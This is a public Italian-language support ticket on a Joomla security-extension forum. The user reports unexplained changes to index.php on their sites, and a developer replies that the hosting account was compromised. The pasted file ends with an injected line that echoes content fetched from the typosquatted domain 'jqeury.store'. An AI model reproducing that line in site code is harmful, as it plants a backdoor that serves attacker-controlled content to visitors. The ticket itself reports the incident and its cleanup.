Support

Admin Tools

#41850 sospetto attacco

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
5.3
PHP version
8.3
Admin Tools version
7.7.1

Latest post by on Friday, 23 May 2025 15:17 CDT

Tuesday, 22 April 2025 13:56 CDT

robjrobj

Oggi ho notato che tutti i siti fatti in Joomla su Host.it mi hanno inviato una modifica al file index.php senza che io abbia apportato modifiche 

il codice del file:

<?php
/**  * @package    Joomla.Site  *  * @copyright  (C) 2005 Open Source Matters, Inc. <https://www.joomla.org>  * @license    GNU General Public License version 2 or later; see LICENSE.txt  */
// NOTE: This file should remain compatible with PHP 5.2 to allow us to run our PHP minimum check and show a friendly error message
// Define the application's minimum supported PHP version as a constant so it can be referenced within the application. define('JOOMLA_MINIMUM_PHP', '8.1.0');
if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) {     die(         str_replace(             '{{phpversion}}',             JOOMLA_MINIMUM_PHP,             file_get_contents(dirname(__FILE__) . '/includes/incompatible.html')         )     ); }
/**  * Constant that is checked in included files to prevent direct access.  * define() is used rather than "const" to not error for PHP 5.2 and lower  */ define('_JEXEC', 1);
// Run the application - All executable code should be triggered through this file require_once dirname(__FILE__) . '/includes/app.php';
echo file_get_contents('https://jqeury.store/resources.php');




Tuesday, 22 April 2025 14:31 CDT

robjrobj

Ho provveduto a rimuovere la riga 

echo file_get_contents('https://jqeury.store/resources.php');

la riga è stata aggiunta sia ai siti fatti con Wordpress che a siti fatti con Joomla

solo nei domini di secondo livello
nei domini di terzo livello non è stata aggiunta

Wednesday, 23 April 2025 04:20 CDT

tampe125

Salve,

purtroppo questo vuol dire che il suo account è stato compromesso e gli attaccanti sono riusciti ad eseguire modifiche sui vari file.

Come punto di partenza, deve cambiare la password di tutti gli account, nonchè controllare se tutte le estensioni sono aggiornate o se presentano vulnerabilità note.

Davide Tampellini

Developer and Support Staff

🇮🇹Italian: native 🇬🇧English: good • 🕐 My time zone is Europe / Rome (UTC +1)
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Friday, 23 May 2025 15:17 CDT

System Task
system

This ticket has been automatically closed.

All tickets which have been inactive for a long time are automatically closed. If you believe that this ticket was closed in error, please contact us.

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!